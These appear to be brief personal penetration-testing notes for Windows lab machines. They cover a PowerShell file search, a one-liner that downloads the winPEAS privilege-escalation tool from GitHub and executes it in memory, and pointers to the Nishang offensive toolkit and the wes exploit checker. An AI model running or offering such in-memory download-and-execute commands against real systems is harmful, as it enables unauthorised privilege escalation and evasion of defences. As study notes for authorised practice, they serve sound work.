Windows Boxes
Powershell
powershell -c "Command"
Get-ChildItem -Path . *.txt -Recurse
- search for file (this case .txt)
Winpeas
Winpeas:
url =
$url = "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe"
One liner to download and execute winPEASany from memory in a PS shell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")
less -r file (make color coded for viewing output file of winpeas)
Nishang
contains:
- execution
- excalation
- backdoors
- bypass
- Scans
- shells
- and more (website here)
wes - exploit checker for win
systeminfo > txt
wes txt
- site